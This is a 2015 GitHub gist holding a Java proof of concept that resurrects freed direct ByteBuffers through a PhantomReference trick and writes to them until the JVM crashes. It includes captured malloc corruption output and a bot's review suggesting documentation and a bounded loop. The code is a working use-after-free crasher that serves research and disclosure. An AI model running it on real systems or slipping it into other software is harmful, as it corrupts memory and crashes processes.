Created
January 20, 2015 22:03
coekie created this gist
Jan 20, 2015
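--- /dev/null
+++ b/ByteBufferUseAfterFree.java
@@ -0,0 +1,29 @@
+import java.nio.ByteBuffer;
+import java.util.ArrayList;
+import java.util.List;
+
+// sub-optimal almost-reliable proof of concept JVM crasher.
+// see http://wouter.coekaerts.be/2015/resurrecting-phantomreference
+public class ByteBufferUseAfterFree {
+    private static final int SIZE = 100_000;
+
+    public static void main(String[] args) {
+        List<ByteBuffer> badBuffers = new ArrayList<>();
+        while (true) { // keep trying until it crashes
+            // create one new buffer pointing to freed memory
+            badBuffers.add(getFreedBuffer(SIZE));
+
+            // overwrite all the bad memory references we collected so far
+            for (ByteBuffer badBuffer : badBuffers) {
+                badBuffer.clear();
+                badBuffer.put(new byte[SIZE]);
+            }
+        }
+    }
+
+    private static ByteBuffer getFreedBuffer(int size) {
+        System.out.print('.'); // indicate we're making progress
+        Necromancer<ByteBuffer> necromancer = new Necromancer<>(ByteBuffer.allocateDirect(size));
+        return necromancer.waitForDeathAndResurrect();
+    }
+}
--- /dev/null
+++ b/OUTPUT_FILE_NAME_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,2 @@
+........java(18061,0x10b5aa000) malloc: *** error for object 0x7f913107e208: incorrect checksum for freed object - object was probably modified after being freed.
+*** set a breakpoint in malloc_error_break to debug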
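Review bot: The header comment on `ByteBufferUseAfterFree` leaves out two things a reader needs to triage or reproduce this under controlled conditions: `Necromancer` is not defined in this file, and neither the JDK build nor the OS behind the captured malloc output is recorded. I would add `// Needs Necromancer from the linked article; observed on <JDK build and OS, not stated on this page>.` above the class. The `while (true)` in `main` also has no exit, so on a runtime where the buffer's memory is never actually released the program presumably either blocks or keeps growing `badBuffers` instead of reporting a result (which one depends on `Necromancer.waitForDeathAndResurrect`, not shown here). A bounded loop such as `for (int attempt = 0; attempt < MAX_ATTEMPTS; attempt++)`, followed by an explicit "not reproduced" message, would let the file double as a regression check. The comment should also say that the malloc checksum abort in the captured output is only one possible symptom, since a write through a stale buffer can corrupt a live allocation without any immediate error.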